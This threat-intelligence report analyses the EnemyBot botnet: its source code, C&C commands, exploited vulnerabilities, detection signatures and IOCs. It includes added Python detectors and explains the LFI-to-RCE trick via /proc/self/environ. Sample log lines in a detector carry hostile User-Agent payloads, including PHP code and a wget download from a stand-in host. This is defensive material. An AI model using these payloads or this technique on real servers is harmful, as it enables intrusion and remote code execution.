Saturday, August 20, 2022

Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices

Executive summary

AT&T Alien Labs™ has been tracking a new IoT botnet dubbed “EnemyBot”, which is believed to be distributed by the threat actor Keksec. During our investigations, Alien Labs has discovered that EnemyBot is expanding its capabilities, exploiting recently identified vulnerabilities (2022), and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers. In addition, the malware's base source code can now be found online on Github, making it widely accessible.

Key takeaways:

  • EnemyBot’s base source code can be found on Github, making it available to anyone who wants to leverage the malware in their attacks.
  • The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities.
  • Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted, as well as IoT and Android devices.
  • The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec).


First discovered by Securonix in March 2022 and later detailed in an in-depth analysis by Fortinet, EnemyBot is a new malware distributed by the threat actor “Keksec” targeting Linux machines and IoT devices.

According to the malware's Github repository, EnemyBot combines source code from several botnets into a more powerful and more adaptable piece of malware. The original botnet code that EnemyBot reuses includes Mirai, Qbot, and Zbot. In addition, the malware includes custom development (see figure 1).


Figure 1. EnemyBot page on Github.

The Keksec threat group is reported to have formed back in 2016 from a number of experienced botnet actors. In November 2021, researchers from Qihoo 360 described the threat actor's activity in detail in a presentation, attributing to Keksec the development of botnets for different platforms including Windows and Linux:

  • Linux based botnets: Tsunami and Gafgyt
  • Windows based botnets: DarkIRC, DarkHTTP
  • Dual systems: Necro (developed in Python)

Source code analysis

The developer of the Github page on EnemyBot self-describes as a “full time malware dev,” who is also available for contract work. The user states their workplace as “Kek security,” implying a possible relationship with the broader Keksec group (see figure 2).


Figure 2. EnemyBot developer description.

The malware repository on Github contains four main sections:

This module is a Python script that downloads all dependencies and compiles the malware for different OS architectures including x86, ARM, macOS, OpenBSD, PowerPC, MIPS, and more (see figure 3).


Figure 3. Compiling malware source code to a macOS executable.

Once compilation is complete, the script then creates a script file ‘’ which is used by the bot as a downloader and is delivered to any identified vulnerable targets to spread the malware.


Figure 4. Generated `` file to spread EnemyBot on different architectures.


This is the main bot source code. Though it is missing the main exploitation function, it includes all other functionality of the malware and the attacks the bot supports, mixing the various botnet source codes mentioned above (Mirai, Qbot, and Zbot), mainly Mirai and Qbot (see figure 5).


Figure 5. EnemyBot source code.


This module is compiled and manually executed by the attacker to encode / decode the malware's strings, so that the strings are hidden in the binary. For that, the malware uses a simple swap table, in which each character is replaced with a corresponding character from the table (see figure 6).


Figure 6. String decode.
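As an added example (not code from the EnemyBot repository, and using a constructed swap table rather than the malware's real one), the following Python shows how such a single-table substitution hides strings and how an analyst reverses it over a binary. Because the table only maps printable characters to other printable characters, obfuscated strings still survive a `strings`-style sweep and decode back with the same table once it has been lifted from the encoder module.

```python
import re

# Constructed swap pairs (NOT the malware's table). Each pair is swapped in
# both directions, so the table is its own inverse: one function both hides
# and reveals strings, matching the "encode / decode" module described above.
SWAP_PAIRS = [("a", "z"), ("e", "q"), ("i", "x"), ("o", "k"), ("s", "v"),
              ("t", "j"), ("/", "|"), (".", ","), ("0", "9"), ("1", "8")]


def build_table(pairs):
    """Return a 256-byte translation table that swaps every listed pair."""
    table = bytearray(range(256))
    for a, b in pairs:
        table[ord(a)], table[ord(b)] = ord(b), ord(a)
    return bytes(table)


TABLE = build_table(SWAP_PAIRS)


def swap(data: bytes, table: bytes = TABLE) -> bytes:
    """Apply the table to every byte; swap(swap(x)) == x."""
    return data.translate(table)


def extract_strings(blob: bytes, min_len: int = 6):
    """Return printable-ASCII runs from a binary, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group(0) for m in re.finditer(pattern, blob)]


def recover_strings(blob: bytes, table: bytes = TABLE, min_len: int = 6):
    """Run every printable run in the binary back through the table.

    Only printable bytes are swapped, so obfuscated strings are still found
    by extract_strings(); decoding them yields the original cleartext."""
    return [swap(run, table) for run in extract_strings(blob, min_len)]


# Constructed cleartext strings and a fake "binary" that carries their
# obfuscated forms between non-printable bytes.
PLAINTEXT = [b"/proc/self/environ", b"User-Agent: Mozilla/5.0", b"/bin/busybox"]
SAMPLE_BLOB = (b"\x7fELF\x01\x01" + swap(PLAINTEXT[0]) + b"\x00\x00"
               + swap(PLAINTEXT[1]) + b"\x00" + swap(PLAINTEXT[2]) + b"\x00\xff")

if __name__ == "__main__":
    for raw, clear in zip(extract_strings(SAMPLE_BLOB), recover_strings(SAMPLE_BLOB)):
        print(raw, "->", clear)
```

With the real table taken from the malware's encoder, the same recover_strings() pass over a bot binary yields its exploit paths, C&C addresses and command strings; the printable-run heuristic also returns junk, so keep whatever decodes to readable ASCII.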


Figure 7 shows the command-and-control (C&C) botnet controller. The C&C is executed on a dedicated machine controlled by the attacker; it can control and send commands to infected machines (figure 7).


Figure 7. C&C component.

New variant analysis

Most of EnemyBot's functionality relates to the malware's spreading capabilities, as well as its ability to scan public-facing assets and look for vulnerable devices. However, the malware also has DDoS capabilities and can receive commands to download and execute new code (modules) from its operators that give the malware additional functionality.

In new variants of EnemyBot, the malware added a webscan function containing a total of 24 exploits to attack vulnerabilities in different devices and web servers (see figure 8).


Figure 8. EnemyBot calls a new function “webscan_xywz”.

To perform these functions, the malware randomly scans IP addresses and, when it gets a response via SYN/ACK, EnemyBot then scans for vulnerabilities on the remote server by executing multiple exploits.

The first exploit is for the Log4j vulnerability discovered last year as CVE-2021-44228 and CVE-2021-45046:


Figure 9. Exploiting the Log4j vulnerability.

The malware can also adopt new vulnerabilities within days of those vulnerabilities being discovered. Some examples are Razer Sila (April 2022), which was published without a CVE (see figure 10), and a remote code execution (RCE) vulnerability impacting VMware Workspace ONE, CVE-2022-22954, the same month (see figure 11).


Figure 10. Exploiting vulnerability in Razer Sila.


Figure 11. Exploiting vulnerability in VMware Workspace ONE.

EnemyBot has also begun targeting content management systems (e.g. WordPress) by searching for vulnerabilities in various plugins, such as “Video Synchro PDF” (see figure 12).


Figure 12. EnemyBot targeting WordPress servers.

In the example shown in figure 12, notice that the malware elevates a local file inclusion (LFI) vulnerability into an RCE by injecting malicious code through ‘/proc/self/environ’. This technique is not new and was described in 2009. The malware uses the LFI to include ‘environ’ and passes the shell command in the User-Agent HTTP header. It works because the web server (or the PHP/CGI process it spawns) exports the request headers into its environment, for example as HTTP_USER_AGENT, so including /proc/self/environ pulls the attacker-controlled header into the page, where the embedded code is interpreted.

Another example of how the malware uses this technique is shown in figure 13. In this example the malware is exploiting a vulnerability in DBltek GoIP.


Figure 13. Executing a shell command through an LFI vulnerability in DBltek.
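The following is an added example, not part of the Alien Labs report, showing the check an operator can run over web-server access logs for both cases above (the WordPress plugin LFI and the DBltek GoIP LFI): a request path that traverses to /proc/self/environ, scored higher when the User-Agent also carries something executable. The log lines, plugin path and addresses are constructed for the example; the regular expressions are assumptions, not the malware's own strings.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format. The sample lines further down are
# constructed for this example; the plugin path and addresses are invented.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Traversal (or an absolute path) that reaches the process environment file.
ENVIRON_RE = re.compile(r"(?:\.\./|/)+proc/self/environ", re.I)

# Content an attacker plants in a request header so that it executes once
# /proc/self/environ is included: PHP tags, command substitution, or a
# downloader/shell invocation.
PAYLOAD_RE = re.compile(r"<\?(?:php)?|\$\(|`|\bsh\b|\bwget\b|\bcurl\b|/bin/", re.I)


def decode(value: str) -> str:
    """URL-decode twice: double-encoding (%252F) is a common filter bypass."""
    return unquote(unquote(value))


def classify(line: str):
    """Return a finding dict for an environ-LFI request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, ua = decode(m["path"]), decode(m["ua"])
    if not ENVIRON_RE.search(path):
        return None
    verdict = "lfi_to_rce" if PAYLOAD_RE.search(ua) else "lfi_probe"
    return {"src": m["src"], "path": path, "ua": ua, "verdict": verdict}


def scan(lines):
    """Run classify() over a log and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


SAMPLE_LOG = [
    # traversal to /proc/self/environ with PHP code in the User-Agent
    '203.0.113.7 - - [20/Aug/2022:10:01:02 +0000] "GET /wp-content/plugins/'
    'example-plugin/view.php?file=../../../../proc/self/environ HTTP/1.1" '
    '200 512 "-" "<?php system(\'id\'); ?>"',
    # same traversal with an ordinary User-Agent: a probe, not yet RCE
    '203.0.113.7 - - [20/Aug/2022:10:01:03 +0000] "GET /wp-content/plugins/'
    'example-plugin/view.php?file=../../../../proc/self/environ HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # double URL-encoded traversal, shell command substitution in User-Agent
    '198.51.100.4 - - [20/Aug/2022:10:02:10 +0000] "GET /cgi-bin/view?page='
    '..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 300 "-" '
    '"$(wget http://198.51.100.5/x -O /tmp/x)"',
    # ordinary traffic
    '192.0.2.10 - - [20/Aug/2022:10:03:00 +0000] "GET /index.php HTTP/1.1" '
    '200 4096 "https://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["verdict"], hit["src"], hit["ua"])
```

A 200 response on an “lfi_to_rce” hit means the include succeeded and the header content was served back; treat the source as having code execution on that host and pull the process list and outbound connections from it, not just the logs.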

If an Android device is connected via USB, or an Android emulator is running on the machine, EnemyBot will try to infect it through adb by executing a shell command (figure 14).


Figure 14. EnemyBot “adb_infect” function to attack Android devices.

After infection, EnemyBot waits for further commands from its C&C. In parallel, it also continues to propagate by scanning for more vulnerable devices. Alien Labs has listed below the commands the bot can receive from its C&C (accurate as of the publishing of this article).

  • Execute shell command
  • Ping to server, wait for command
  • Change loader server for payload
  • Turn on sniffer
  • Create a reverse shell on an infected machine
  • Turn off sniffer
  • Start UDP flood attack
  • Start TCP flood attack
  • Start HTTP flood attack
  • Start TCP connection flooder
  • Start TLS attack: start the handshake without closing the socket
  • Start non-spoofed UDP flooder
  • Start DNS flooder
  • Start/stop scanner: scan and infect vulnerable devices
  • Start DDoS attack on OVH
  • Start ICMP flooder
  • Stop ongoing attacks, kill child processes
  • Start targeted attack on ARK: Survival Evolved video game servers
  • Download targets list from C&C and start DNS attack
  • Start SSDP flood attack

We have also listed the current vulnerabilities EnemyBot uses. As mentioned, some of them have not been assigned a CVE yet (as of the publishing of this article).

  • Log4j (CVE-2021-44228, CVE-2021-45046)
  • Adobe ColdFusion 11 RCE (no CVE; vulnerability published 2022-02)
  • Liferay Portal – Java Unmarshalling via JSONWS RCE
  • PHP Scriptcase 9.7 RCE (no CVE; vulnerability published 2022-04)
  • Zyxel NWA-1100-NH command injection
  • Razer Sila – command injection (no CVE; vulnerability published 2022-04)
  • Spring Cloud Gateway – code injection vulnerability
  • VMware Workspace ONE RCE
  • Kramer VIAware RCE (CVE-2021-36356, CVE-2021-35064)
  • WordPress Video Synchro PDF plugin LFI (no CVE; vulnerability published 2022-03)
  • Dbltek GoIP LFI (no CVE; vulnerability published 2022-02)
  • WordPress Cab Fare Calculator plugin LFI (no CVE; vulnerability published 2022-03)
  • Archeevo 5.0 LFI (no CVE; vulnerability published 2022-03)
  • Fuel CMS 1.4.1 RCE
  • ThinkPHP 5.X RCE (no CVE; vulnerability published 2019)
  • Netgear DGN1000 ‘Setup.cgi’ RCE (no CVE; vulnerability published 2017)
  • TOTOLink A3000RU command injection vulnerability
  • D-Link devices – HNAP SOAPAction header command injection vulnerability
  • ZHOME < S3.0.501 RCE
  • Zyxel P660HN – unauthenticated command injection
  • Seowon SLR 120 router RCE
  • D-Link DWR command injection in various models

Recommended actions

  1. Maintain minimal exposure to the Internet on Linux servers and IoT devices and use a properly configured firewall.
  2. Enable automatic updates to ensure your software has the latest security updates.
  3. Monitor network traffic, outbound port scans, and unreasonable bandwidth usage.
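For action 3 above (and the random SYN scanning described under the new variant analysis), here is an added example, not from the report, of the check in Python: count distinct destinations per (source, port) over a sliding window of outbound SYNs. A bot scanning random addresses for one service produces many SYNs to many hosts on the same port in seconds, while a normal client talks to a handful of hosts and completes its handshakes. The flow records are constructed; the record format, addresses, window and threshold are assumptions for the example.

```python
from collections import defaultdict, deque

# Flow records as "epoch_seconds src dst dport tcp_flags", one per SYN or
# SYN/ACK seen at the network edge. The records below are constructed for
# this example; addresses and timestamps are invented.


def parse_flow(line: str):
    ts, src, dst, dport, flags = line.split()
    return float(ts), src, dst, int(dport), flags


def detect_scanners(lines, window_s: float = 10.0, threshold: int = 20):
    """Flag (src, dport) pairs that sent a plain SYN to at least `threshold`
    distinct destinations within any `window_s`-second window.

    Returns a dict mapping each flagged pair to the peak number of distinct
    destinations seen inside one window."""
    recent = defaultdict(deque)   # (src, dport) -> deque of (ts, dst)
    alerts = {}
    for ts, src, dst, dport, flags in sorted(map(parse_flow, lines)):
        if flags != "S":          # only initial SYNs, not SYN/ACK replies
            continue
        key = (src, dport)
        q = recent[key]
        q.append((ts, dst))
        while ts - q[0][0] > window_s:   # slide the window forward
            q.popleft()
        distinct = len({d for _, d in q})
        if distinct >= threshold:
            alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts


def constructed_flows():
    """Constructed sample: one scanner and one ordinary client."""
    base = 1660989600.0
    flows = []
    # scanner: a SYN every 0.2 s to 30 different hosts on port 80
    for i in range(30):
        flows.append(f"{base + i * 0.2:.1f} 10.0.0.5 203.0.113.{i + 1} 80 S")
    # ordinary client: three hosts on 443, each handshake answered
    for i, dst in enumerate(["198.51.100.1", "198.51.100.2", "198.51.100.3"]):
        flows.append(f"{base + i:.1f} 10.0.0.9 {dst} 443 S")
        flows.append(f"{base + i + 0.1:.1f} {dst} 10.0.0.9 443 SA")
    return flows


SAMPLE_FLOWS = constructed_flows()

if __name__ == "__main__":
    for (src, dport), peak in detect_scanners(SAMPLE_FLOWS).items():
        print(f"{src} hit {peak} distinct hosts on port {dport}")
```

Tune the threshold to the host's role: a mail relay or monitoring box legitimately fans out on one port, so pair the count with the absence of completed handshakes (a high SYN to SYN/ACK ratio) before acting on the alert.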


Keksec’s EnemyBot appears to be just starting to spread; however, due to the authors’ rapid updates, this botnet has the potential to become a major threat to IoT devices and web servers. The malware can quickly adopt one-day vulnerabilities (within days of a published proof of concept). This indicates that the Keksec group is well resourced and has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.

Detection methods

The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or to aid additional research.


Log4j sids: 2018202, 2018203, 2034647, 2034648, 2034649, 2034650, 2034651, 2034652, 2034653, 2034654, 2034655, 2034656, 2034657, 2034658, 2034659, 2034660, 2034661, 2034662, 2034663, 2034664, 2034665, 2034666, 2034667, 2034668, 2034671, 2034672, 2034673, 2034674, 2034676, 2034699, 2034700, 2034701, 2034702, 2034703, 2034706, 2034707, 2034708, 2034709, 2034710, 2034711, 2034712, 2034713, 2034714, 2034715, 2034716, 2034717, 2034723, 2034743, 2034744, 2034747, 2034748, 2034749, 2034750, 2034751, 2034755, 2034757, 2034758, 2034759, 2034760, 2034761, 2034762, 2034763, 2034764, 2034765, 2034766, 2034767, 2034768, 2034781, 2034782, 2034783, 2034784, 2034785, 2034786, 2034787, 2034788, 2034789, 2034790, 2034791, 2034792, 2034793, 2034794, 2034795, 2034796, 2034797, 2034798, 2034799, 2034800, 2034801, 2034802, 2034803, 2034804, 2034805, 2034806, 2034807, 2034808, 2034809, 2034810, 2034811, 2034819, 2034820, 2034831, 2034834, 2034835, 2034836, 2034839, 2034886, 2034887, 2034888, 2034889, 2034890, 2838340, 2847596, 4002714, 4002715

4001913: AV EXPLOIT LifeRay RCE (CVE-2020-7961)

4001943: AV EXPLOIT Liferay Portal Java Unmarshalling RCE (CVE-2020-7961)

4002589: AV EXPLOIT LifeRay Remote Code Execution – update-column (CVE-2020-7961)

2031318: ET CURRENT_EVENTS 401TRG Liferay RCE (CVE-2020-7961)

2031592: ET WEB_SPECIFIC_APPS Liferay Unauthenticated RCE via JSONWS Inbound (CVE-2020-7961)

2035955: ET EXPLOIT Razer Sila Router – Command Injection Attempt Inbound (No CVE)

2035956: ET EXPLOIT Razer Sila Router – LFI Attempt Inbound (No CVE)

2035380: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-22947) (set)

2035381: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-22947)

2035876: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2035875: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2035874: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)

2036416: ET EXPLOIT Possible VMware Workspace ONE Access RCE via Server-Side Template Injection Inbound (CVE-2022-22954)

4002364: AV EXPLOIT Fuel CMS RCE (CVE-2018-16763)

2030469: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M1

2030483: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M2

2836503: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Inbound

2836504: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Outbound

2836633: ETPRO EXPLOIT BlackSquid Failed ThinkPHP Payload Inbound

2026731: ET WEB_SERVER ThinkPHP RCE Exploitation Attempt

2024916: ET EXPLOIT Netgear DGN Remote Command Execution

2029215: ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound

2034576: ET EXPLOIT Netgear DGN Remote Code Execution

2035746: ET EXPLOIT Totolink – Command Injection Attempt Inbound (CVE-2022-25075)

4001488: AV TROJAN Mirai Outbound Exploit Scan, D-Link HNAP RCE (CVE-2015-2051)

2034491: ET EXPLOIT D-Link HNAP SOAPAction Command Injection (CVE-2015-2051)

4000095: AV EXPLOIT Unauthenticated Command Injection (ZyXEL P660HN-T v1)

4002327: AV TROJAN Mirai faulty Zyxel exploit attempt

2027092: ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE

4002226: AV EXPLOIT Seowon Router RCE (CVE-2020-17456)

2035950: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M1 (CVE-2020-17456)

2035951: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M2 (CVE-2020-17456)

2035953: ET EXPLOIT D-Link DWR Command Injection Inbound (CVE-2018-10823)



Java Process Spawning Scripting Process

Java Process Spawning WMIC

Java Process Spawning Scripting Process via Commandline (For Jenkins servers)

Suspicious process executed by Jenkins Groovy scripts (For Jenkins servers)

Suspicious command executed by a Java listening process (For Linux servers)

Related indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities that are related but out of the scope of the report.

Indicator types in the pulse for this report: Malware C&C (1 indicator) and Malware hash (15 indicators).


Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

  • TA0001: Initial Access:
    • T1190: Exploit Public-Facing Application
  • TA0008: Lateral Movement:
    • T1210: Exploitation of Remote Services
    • T1021: Remote Services
  • TA0011: Command and Control:
    • T1132: Data Encoding
    • T1001: Data Obfuscation
    • T1090: Proxy

